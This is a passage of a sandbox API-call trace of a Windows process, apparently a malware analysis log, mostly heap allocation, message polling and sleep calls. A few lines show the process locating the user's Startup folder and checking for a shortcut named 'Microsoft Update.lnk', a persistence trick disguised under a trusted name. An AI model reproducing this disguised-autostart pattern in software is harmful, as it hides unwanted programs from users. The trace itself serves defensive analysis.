lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0263.086] FreeLibrary (hLibModule=0x76240000) returned 1 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0263.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866180 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0263.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865f58 | out: hHeap=0x2af0000) returned 1 [0263.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0263.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0263.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0263.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0263.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0263.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0263.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0263.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0263.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0263.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0263.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0263.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0263.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0263.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0263.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0263.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0263.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0263.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0263.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0263.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3866180 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0263.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0263.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0263.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0263.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0263.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0263.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0263.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0263.091] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0263.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0263.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0263.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0263.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0263.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0263.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0263.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0263.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0263.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0263.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0263.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0263.092] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0263.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0263.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0263.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0263.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0263.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0263.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0263.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0263.092] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0263.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0263.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0263.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0263.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0263.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0263.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0263.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0263.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0263.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0263.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0263.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0263.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0263.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0263.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0263.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0263.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0263.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0263.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0263.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0263.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0263.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0263.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0263.094] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0263.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0263.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0263.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0263.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0263.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0263.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0263.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0263.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0263.094] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0263.094] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0263.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0263.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0263.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0263.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0263.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0263.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0263.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0263.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0263.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0263.095] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0263.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0263.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0263.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0263.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0263.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0263.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0263.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0263.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0263.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0263.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0263.095] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0263.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0263.096] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0263.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0263.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0263.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0263.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0263.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0263.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0263.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0263.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0263.096] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0263.096] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.096] timeGetTime () returned 0x1181911 [0263.096] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0263.096] Sleep (dwMilliseconds=0xa) [0263.178] timeGetTime () returned 0x118196f [0263.178] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0263.178] TranslateMessage (lpMsg=0x8cf798) returned 0 [0263.178] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0263.178] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0263.178] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0263.178] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0263.178] Sleep (dwMilliseconds=0xa) [0263.272] timeGetTime () returned 0x11819cd [0263.273] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0263.273] Sleep (dwMilliseconds=0xa) [0263.369] timeGetTime () returned 0x1181a2a [0263.369] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0263.369] Sleep (dwMilliseconds=0xa) [0263.538] timeGetTime () returned 0x1181ad6 [0263.538] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0263.538] Sleep (dwMilliseconds=0xa) [0263.631] timeGetTime () returned 0x1181b34 [0263.631] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0263.631] Sleep (dwMilliseconds=0xa) [0263.677] timeGetTime () returned 0x1181b58 [0263.677] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0263.677] Sleep (dwMilliseconds=0xa) [0263.831] timeGetTime () returned 0x1181bfc [0263.831] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0263.831] Sleep (dwMilliseconds=0xa) [0263.854] timeGetTime () returned 0x1181c0b [0263.855] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0263.855] Sleep (dwMilliseconds=0xa) [0263.894] timeGetTime () returned 0x1181c3a [0263.894] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0263.894] Sleep (dwMilliseconds=0xa) [0263.941] timeGetTime () returned 0x1181c69 [0263.941] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0263.941] TranslateMessage (lpMsg=0x8cf798) returned 0 [0263.941] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0263.941] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0263.941] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0263.941] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0263.941] Sleep (dwMilliseconds=0xa) [0263.987] timeGetTime () returned 0x1181c98 [0263.987] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0263.987] Sleep (dwMilliseconds=0xa) [0264.019] timeGetTime () returned 0x1181cb8 [0264.019] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0264.019] Sleep (dwMilliseconds=0xa) [0264.069] timeGetTime () returned 0x1181ce6 [0264.069] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0264.069] Sleep (dwMilliseconds=0xa) [0264.112] timeGetTime () returned 0x1181d15 [0264.115] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0264.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0264.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0264.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 